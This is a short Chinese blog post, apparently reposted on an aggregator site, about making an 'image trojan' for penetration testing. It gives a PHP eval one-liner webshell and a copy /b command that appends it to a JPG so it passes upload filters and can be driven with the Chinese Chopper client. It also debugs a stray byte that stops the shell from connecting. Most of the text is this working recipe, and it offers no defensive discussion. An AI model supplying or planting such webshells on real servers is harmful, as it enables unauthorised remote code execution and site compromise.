图片木马-渗透测试

制作图片木马中的问题

问题 ：copy命令制作图片木马后，菜刀无法连接

1.执行步骤：

一张普通图片：1.jpg
php版本一句话木马，保存为 1.php，代码如下：

<?php @eval($_POST['pass']);?>

制作图片木马，将图片文件和php文件合并为2.jpg，命令如下：

copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表以二进制编码打开文件，/a代表以ASCII码编码打开文件

上传成功后，用菜刀连接，弹出成功获取图片，未拿到webshell。

2.问题排查

用HxD hex editor打开制作的图片木马 2.jpg ，如下图。发现，一句话木马已经拼接到尾部，但是多了一个符号 ‘.’(红色的点）。

去掉多余的符号后，再次上传就ok了。

3.问题解决

修改copy命令如下：

copy 1.jpg/b+1.php/b 2.jpg

再次用HxD hex editor打开修改后的图片木马，多余的点已消失。
但此时的图片木马无法连接菜刀

然而当使用如下命令时：

copy 1.jpg/a+1.php/a 2.jpg

还是会出现多余的点，猜测是因为ASCII编码方式导致的，希望有大神可以解释一下这个现象。

本文结束

总结

以上是生活随笔为你收集整理的图片木马-渗透测试的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。